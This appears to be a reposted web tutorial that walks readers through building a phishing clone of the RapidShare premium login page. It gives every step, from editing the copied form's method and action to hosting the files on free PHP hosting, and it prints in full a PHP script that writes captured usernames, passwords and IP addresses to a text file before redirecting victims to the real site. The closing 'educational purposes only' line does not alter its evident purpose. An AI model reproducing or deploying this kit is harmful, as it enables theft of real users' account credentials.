1.You can use this same tut for anything else…

2. Go to

http://www.rapidshare.com

and navigate to the premium account log-in screen at the url :

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi

3. We will now begin to make our phisher. Start by right clicking on the page and click view source.

4. Select all and paste into a notepad document.

5. You should see a bunch of random html coding, but we are only interested in two words: method and action.

6. Do a search in the document for the word “method” (without quotes).

7. Your result should be something like : method=”post”

8. Change the word post to the word get.

9. Now do a search for the word “action” (without quotes). action is usually very close to method so you may not even have to do a search for it.

10. You should see something like this: action=”

https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”

11. Where the url in between the quotes is, replace the text with next.php so the new part says: action=”next.php”

12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.

14. Copy and paste this code into the notepad document:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: Put your REDIRECT URL Here”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:

<?php
$datum = date(‘d-m-Y / H:i:s’);
$ip = $_SERVER[‘REMOTE_ADDR’];
header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);
$handle = fopen(“password.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);
fwrite($handle, “\r\n”);
fclose($handle);

setcookie (“user”, “empty”, time()+3600);
exit;
?>

16. Save this file as next.php and open up a new notepad document.

17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen(”password.txt”, “a”);
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.

18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.

19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.

credits to the author watchdog

This is for educational purposes only.

Explore More

How to install APF (Advanced Policy Firewall) and DDOS Deflate

What is APF (Advanced Policy Firewall)? APF Firewall APF is a policy based iptables firewall system designed for ease of use and configuration. It employs a subset of features to

Webmasters misery after the website got hacked; Google sandbox, Hosting dismissal and much more

Hello, I run a websites on graphics design, greeting cards and website design. Most of the items are free for visitors and I make my money from advertisement using Adsense.

Critical SQL Injection in Red Link

PlanetCreator has reported another critical SQL Injection (vulnerability) on Red Link http://www.redlink.net.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of